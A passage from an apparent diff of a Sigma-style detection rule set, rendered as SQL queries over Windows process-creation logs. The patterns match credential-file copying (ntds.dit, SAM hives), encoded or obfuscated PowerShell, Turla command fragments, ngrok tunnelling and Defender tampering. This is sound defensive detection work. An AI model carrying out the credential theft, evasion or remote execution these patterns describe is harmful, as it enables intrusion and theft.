CommandLine LIKE '%MiniDump%' ESCAPE '\\' OR CommandLine LIKE '%net user %' ESCAPE '\\'))) AND NOT ((CommandLine = 'ping 127.0.0.1 -n 5') OR (NewProcessName LIKE '%\\\\PING.EXE' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\DismFoDInstall.cmd%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\bin\\\\javaws.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\bin\\\\jp2launcher.exe' ESCAPE '\\' AND CommandLine LIKE '% -ma %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_run_script_from_ads.yml" + "filename": "proc_creation_win_susp_system_user_anomaly.yml" }, { - "title": "Suspicious Use of CSharp Interactive Console", - "id": "a9e416a8-e613-4f8b-88b8-a7d1d1af2f61", - "status": "test", - "description": "Detects the execution of CSharp interactive console by PowerShell", - "author": "Michael R. (@nahamike01)", + "title": "Password Protected Compressed File Extraction Via 7Zip", + "id": "b717b8fd-6467-4d7d-b3d3-27f9a463af77", + "status": "experimental", + "description": "Detects usage of 7zip utilities (7z.exe, 7za.exe and 7zr.exe) to extract password protected zip files.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1127" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Possible depending on environment. Pair with other factors such as net connections, command-line args, etc." + "Legitimate activity is expected since extracting files with a password can be common in some environement." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\csi.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND OriginalFileName = 'csi.exe')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\7z.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7zr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND (CommandLine LIKE '% -p%' ESCAPE '\\' AND CommandLine LIKE '% x %' ESCAPE '\\' AND CommandLine LIKE '% -o%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_csi_use_of_csharp_console.yml" + "filename": "proc_creation_win_7zip_password_extraction.yml" }, { - "title": "Whoami Utility Execution", - "id": "e28a5a99-da44-436d-b7a0-2afc20a5f413", - "status": "test", - "description": "Detects the execution of whoami, which is often used by attackers after exploitation / privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "title": "Start of NT Virtual DOS Machine", + "id": "16905e21-66ee-42fe-b256-1318ada2d770", + "status": "experimental", + "description": "Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.defense_evasion" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment", - "Monitoring activity" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\ntvdm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csrstub.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_whoami_execution.yml" + "filename": "proc_creation_win_susp_16bit_application.yml" }, { - "title": "Hardware Model Reconnaissance Via Wmic.EXE", - "id": "3e3ceccd-6c06-48b8-b5ff-ab1d25db8c1d", + "title": "Suspicious FromBase64String Usage On Gzip Archive - Process Creation", + "id": "d75d6b6b-adb9-48f7-824b-ac2e786efe1f", "status": "experimental", - "description": "Detects the execution of WMIC with the \"csproduct\" which is used to obtain information such as hardware models and vendor information", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.execution", - "attack.t1047", - "car.2016-03-002" - ], + "description": "Detects attempts of decoding a base64 Gzip archive via PowerShell. This technique is often used as a method to load malicious content into memory afterward.", + "author": "frack113", "falsepositives": [ - "Unknown" + "Legitimate administrative script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%csproduct%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%FromBase64String%' ESCAPE '\\' AND CommandLine LIKE '%MemoryStream%' ESCAPE '\\' AND CommandLine LIKE '%H4sI%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmic_recon_csproduct.yml" + "filename": "proc_creation_win_powershell_frombase64string_archive.yml" }, { - "title": "PUA - Advanced IP Scanner Execution", - "id": "bef37fa2-f205-4a7b-b484-0759bfd5f86f", - "status": "experimental", - "description": "Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.", - "author": "Nasreddine Bencherchali (Nextron Systems), @ROxPinTeddy", + "title": "Execution via Diskshadow.exe", + "id": "0c2f8629-7129-4a8a-9897-7e0768f13ff2", + "status": "test", + "description": "Detects using Diskshadow.exe to execute arbitrary code in text file", + "author": "Ivan Dyachkov, oscd.community", "tags": [ - "attack.discovery", - "attack.t1046", - "attack.t1135" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Legitimate administrative use" + "False postitve can be if administrators use diskshadow tool in their infrastructure as a main backup tool with scripts." ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\advanced\\_ip\\_scanner%' ESCAPE '\\' OR OriginalFileName LIKE '%advanced\\_ip\\_scanner%' ESCAPE '\\' OR Description LIKE '%Advanced IP Scanner%' ESCAPE '\\') OR (CommandLine LIKE '%/portable%' ESCAPE '\\' AND CommandLine LIKE '%/lng%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\diskshadow.exe' ESCAPE '\\' AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_advanced_ip_scanner.yml" + "filename": "proc_creation_win_lolbin_diskshadow.yml" }, { - "title": "Remote PowerShell Session Host Process (WinRM)", - "id": "734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8", - "status": "test", - "description": "Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session).", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE", + "id": "48917adc-a28e-4f5d-b729-11e75da8941f", + "status": "experimental", + "description": "Detects the usage of \"reg.exe\" to add Defender folder exclusions. Qbot has been seen using this technique to add exlcusions for folders within AppData and ProgramData.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.t1021.006" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate usage of remote Powershell, e.g. for monitoring purposes." + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' AND (CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\Paths%' ESCAPE '\\' OR CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Microsoft Antimalware\\\\Exclusions\\\\Paths%' ESCAPE '\\') AND CommandLine LIKE '%ADD %' ESCAPE '\\' AND CommandLine LIKE '%/t %' ESCAPE '\\' AND CommandLine LIKE '%REG\\_DWORD %' ESCAPE '\\' AND CommandLine LIKE '%/v %' ESCAPE '\\' AND CommandLine LIKE '%/d %' ESCAPE '\\' AND CommandLine LIKE '%0%' ESCAPE '\\')" ], - "filename": "proc_creation_win_winrm_remote_powershell_session_process.yml" + "filename": "proc_creation_win_reg_defender_exclusion.yml" }, { - "title": "PUA - AdvancedRun Execution", - "id": "d2b749ee-4225-417e-b20e-a8d2193cbb84", + "title": "CL_Mutexverifiers.ps1 Proxy Execution", + "id": "1e0e1a81-e79b-44bc-935b-ddb9c8006b3d", "status": "experimental", - "description": "Detects the execution of AdvancedRun utility", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of a Microsoft signed script to execute commands", + "author": "oscd.community, Natalia Shornikova, frack113", + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'AdvancedRun.exe' OR (CommandLine LIKE '% /EXEFilename %' ESCAPE '\\' AND CommandLine LIKE '% /Run%' ESCAPE '\\') OR (CommandLine LIKE '% /WindowState 0%' ESCAPE '\\' AND CommandLine LIKE '% /RunAs %' ESCAPE '\\' AND CommandLine LIKE '% /CommandLine %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\CL\\_Mutexverifiers.ps1%' ESCAPE '\\' AND CommandLine LIKE '%runAfterCancelProcess %' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_advancedrun.yml" + "filename": "proc_creation_win_lolbin_cl_mutexverifiers.yml" }, { - "title": "Ps.exe Renamed SysInternals Tool", - "id": "18da1007-3f26-470f-875d-f77faf1cab31", + "title": "PUA - Ngrok Execution", + "id": "ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31", "status": "test", - "description": "Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report", + "description": "Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.\nInvolved domains are bin.equinox.io for download and *.ngrok.io for connections.\n", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.g0035", - "attack.t1036.003", - "car.2013-05-009" + "attack.command_and_control", + "attack.t1572" ], "falsepositives": [ - "Renamed SysInternals tool" + "Another tool that uses the command line switches of Ngrok", + "Ngrok http 3978 (https://docs.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine = 'ps.exe -accepteula')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% tcp 139%' ESCAPE '\\' OR CommandLine LIKE '% tcp 445%' ESCAPE '\\' OR CommandLine LIKE '% tcp 3389%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5985%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5986%' ESCAPE '\\') OR (CommandLine LIKE '% start %' ESCAPE '\\' AND CommandLine LIKE '%--all%' ESCAPE '\\' AND CommandLine LIKE '%--config%' ESCAPE '\\' AND CommandLine LIKE '%.yml%' ESCAPE '\\') OR (NewProcessName LIKE '%ngrok.exe' ESCAPE '\\' AND (CommandLine LIKE '% tcp %' ESCAPE '\\' OR CommandLine LIKE '% http %' ESCAPE '\\' OR CommandLine LIKE '% authtoken %' ESCAPE '\\')) OR (CommandLine LIKE '%.exe authtoken %' ESCAPE '\\' OR CommandLine LIKE '%.exe start --all%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_ta17_293a_ps.yml" + "filename": "proc_creation_win_pua_ngrok.yml" }, { - "title": "Use of UltraViewer Remote Access Software", - "id": "88656cec-6c3b-487c-82c0-f73ebb805503", - "status": "experimental", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "title": "Suspicious Control Panel DLL Load", + "id": "d7eb979b-c2b5-4a6f-a3a7-c87ce6763819", + "status": "test", + "description": "Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'UltraViewer' OR Company = 'DucFabulous Co,ltd' OR OriginalFileName LIKE 'UltraViewer\\_Desktop.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\System32\\\\control.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE')) AND NOT (CommandLine LIKE '%Shell32.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_remote_access_software_ultraviewer.yml" + "filename": "proc_creation_win_rundll32_susp_control_dll_load.yml" }, { - "title": "Dropping Of Password Filter DLL", - "id": "b7966f4a-b333-455b-8370-8ca53c229762", - "status": "test", - "description": "Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS", - "author": "Sreeman", + "title": "Delete Important Scheduled Task", + "id": "dbc1f800-0fe0-4bc0-9c66-292c2abe3f78", + "status": "experimental", + "description": "Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1556.002" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa%' ESCAPE '\\' AND CommandLine LIKE '%scecli\\\\0%' ESCAPE '\\' AND CommandLine LIKE '%reg add%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/delete%' ESCAPE '\\' AND CommandLine LIKE '%/tn%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_credential_access_via_password_filter.yml" + "filename": "proc_creation_win_schtasks_delete.yml" }, { - "title": "Malicious Base64 Encoded PowerShell Keywords in Command Lines", - "id": "f26c6093-6f14-4b12-800f-0fcb46f5ffd0", + "title": "Turla Group Commands May 2020", + "id": "9e2e51c5-c699-4794-ba5a-29f5da40ac0c", "status": "test", - "description": "Detects base64 encoded strings used in hidden malicious PowerShell command lines", - "author": "John Lambert (rule)", + "description": "Detects commands used by Turla group as reported by ESET in May 2020", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.g0010", "attack.execution", - "attack.t1059.001" + "attack.t1059.001", + "attack.t1053.005", + "attack.t1027" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '% hidden %' ESCAPE '\\' AND (CommandLine LIKE '%AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%aXRzYWRtaW4gL3RyYW5zZmVy%' ESCAPE '\\' OR CommandLine LIKE '%IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%JpdHNhZG1pbiAvdHJhbnNmZX%' ESCAPE '\\' OR CommandLine LIKE '%YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%Yml0c2FkbWluIC90cmFuc2Zlc%' ESCAPE '\\' OR CommandLine LIKE '%AGMAaAB1AG4AawBfAHMAaQB6AGUA%' ESCAPE '\\' OR CommandLine LIKE '%JABjAGgAdQBuAGsAXwBzAGkAegBlA%' ESCAPE '\\' OR CommandLine LIKE '%JGNodW5rX3Npem%' ESCAPE '\\' OR CommandLine LIKE '%QAYwBoAHUAbgBrAF8AcwBpAHoAZQ%' ESCAPE '\\' OR CommandLine LIKE '%RjaHVua19zaXpl%' ESCAPE '\\' OR CommandLine LIKE '%Y2h1bmtfc2l6Z%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg%' ESCAPE '\\' OR CommandLine LIKE '%lPLkNvbXByZXNzaW9u%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA%' ESCAPE '\\' OR CommandLine LIKE '%SU8uQ29tcHJlc3Npb2%' ESCAPE '\\' OR CommandLine LIKE '%Ty5Db21wcmVzc2lvb%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA%' ESCAPE '\\' OR CommandLine LIKE '%lPLk1lbW9yeVN0cmVhb%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A%' ESCAPE '\\' OR CommandLine LIKE '%SU8uTWVtb3J5U3RyZWFt%' ESCAPE '\\' OR CommandLine LIKE '%Ty5NZW1vcnlTdHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%4ARwBlAHQAQwBoAHUAbgBrA%' ESCAPE '\\' OR CommandLine LIKE '%5HZXRDaHVua%' ESCAPE '\\' OR CommandLine LIKE '%AEcAZQB0AEMAaAB1AG4Aaw%' ESCAPE '\\' OR CommandLine LIKE '%LgBHAGUAdABDAGgAdQBuAGsA%' ESCAPE '\\' OR CommandLine LIKE '%LkdldENodW5r%' ESCAPE '\\' OR CommandLine LIKE '%R2V0Q2h1bm%' ESCAPE '\\' OR CommandLine LIKE '%AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A%' ESCAPE '\\' OR CommandLine LIKE '%QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA%' ESCAPE '\\' OR CommandLine LIKE '%RIUkVBRF9JTkZPNj%' ESCAPE '\\' OR CommandLine LIKE '%SFJFQURfSU5GTzY0%' ESCAPE '\\' OR CommandLine LIKE '%VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA%' ESCAPE '\\' OR CommandLine LIKE '%VEhSRUFEX0lORk82N%' ESCAPE '\\' OR CommandLine LIKE '%AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA%' ESCAPE '\\' OR CommandLine LIKE '%cmVhdGVSZW1vdGVUaHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA%' ESCAPE '\\' OR CommandLine LIKE '%NyZWF0ZVJlbW90ZVRocmVhZ%' ESCAPE '\\' OR CommandLine LIKE '%Q3JlYXRlUmVtb3RlVGhyZWFk%' ESCAPE '\\' OR CommandLine LIKE '%QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA%' ESCAPE '\\' OR CommandLine LIKE '%0AZQBtAG0AbwB2AGUA%' ESCAPE '\\' OR CommandLine LIKE '%1lbW1vdm%' ESCAPE '\\' OR CommandLine LIKE '%AGUAbQBtAG8AdgBlA%' ESCAPE '\\' OR CommandLine LIKE '%bQBlAG0AbQBvAHYAZQ%' ESCAPE '\\' OR CommandLine LIKE '%bWVtbW92Z%' ESCAPE '\\' OR CommandLine LIKE '%ZW1tb3Zl%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%tracert -h 10 yahoo.com%' ESCAPE '\\' OR CommandLine LIKE '%.WSqmCons))|iex;%' ESCAPE '\\' OR CommandLine LIKE '%Fr`omBa`se6`4Str`ing%' ESCAPE '\\') OR (CommandLine LIKE '%net use https://docs.live.net%' ESCAPE '\\' AND CommandLine LIKE '%@aol.co.uk%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_hidden_b64_cmd.yml" + "filename": "proc_creation_win_apt_turla_comrat_may20.yml" }, { - "title": "WebDav Client Execution", - "id": "2dbd9d3d-9e27-42a8-b8df-f13825c6c3d5", - "status": "test", - "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie.\nThis could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server).\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Shells Spawned by Java", + "id": "dff1e1cc-d3fd-47c8-bfc2-aeb878a754c0", + "status": "experimental", + "description": "Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation)", + "author": "Andreas Hunkeler (@Karneades), Nasreddine Bencherchali", "tags": [ - "attack.exfiltration", - "attack.t1048.003" + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ - "Unknown" + "Legitimate calls to system binaries", + "Company specific internal usage" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%build%' ESCAPE '\\' AND CommandLine LIKE '%build%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_webdav_client_execution.yml" + "filename": "proc_creation_win_java_susp_child_process_2.yml" }, { - "title": "Potential Credential Dumping Attempt Using New NetworkProvider - CLI", - "id": "baef1ec6-2ca9-47a3-97cc-4cf2bda10b77", + "title": "Install New Package Via Winget Local Manifest", + "id": "313d6012-51a0-4d93-8dfc-de8553239e25", "status": "experimental", - "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them.\nThe manifest option enables you to install an application by passing in a YAML file directly to the client.\nWinget can be used to download and install exe, msi or msix files later.\n", + "author": "Sreeman, Florian Roth (Nextron Systems), frack113", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.defense_evasion", + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Other legitimate network providers used and not filtred in this rule" + "Some false positives are expected in some environment that may use this functionality to install and test their custom applications" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\NetworkProvider%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND (CommandLine LIKE '%install%' ESCAPE '\\' OR CommandLine LIKE '% add %' ESCAPE '\\') AND (CommandLine LIKE '%-m %' ESCAPE '\\' OR CommandLine LIKE '%--manifest%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_registry_new_network_provider.yml" + "filename": "proc_creation_win_winget_local_install_via_manifest.yml" }, { - "title": "Nslookup PowerShell Download Cradle - ProcessCreation", - "id": "1b3b01c7-84e9-4072-86e5-fc285a41ff23", + "title": "Rundll32 UNC Path Execution", + "id": "5cdb711b-5740-4fb2-ba88-f7945027afac", "status": "experimental", - "description": "Detects suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records", + "description": "Detects rundll32 execution where the DLL is located on a remote location (share)", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.execution", + "attack.t1021.002", + "attack.t1218.011" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\nslookup.exe%' ESCAPE '\\' OR OriginalFileName LIKE '\\\\nslookup.exe' ESCAPE '\\') AND ((ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -q=txt %' ESCAPE '\\' OR CommandLine LIKE '% -querytype=txt %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_nslookup_poweshell_download.yml" + "filename": "proc_creation_win_rundll32_unc_path.yml" }, { - "title": "Suspicious File Download Using Office Application", - "id": "0c79148b-118e-472b-bdb7-9b57b444cc19", + "title": "Copying Sensitive Files with Credential Data", + "id": "e7be6119-fc37-43f0-ad4f-1f3f99be2f9f", "status": "test", - "description": "Detects the usage of one of three Microsoft office applications (Word, Excel, PowerPoint) to download arbitrary files", - "author": "Beyu Denis, oscd.community", + "description": "Files with well-known filenames (sensitive files with credential data) copying", + "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.003", + "car.2013-07-001", + "attack.s0404" ], "falsepositives": [ - "Unknown" + "Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic invetigator" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\esentutl.exe' ESCAPE '\\') AND (CommandLine LIKE '%vss%' ESCAPE '\\' OR CommandLine LIKE '% /m %' ESCAPE '\\' OR CommandLine LIKE '% /y %' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\system %' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\security%' ESCAPE '\\' OR 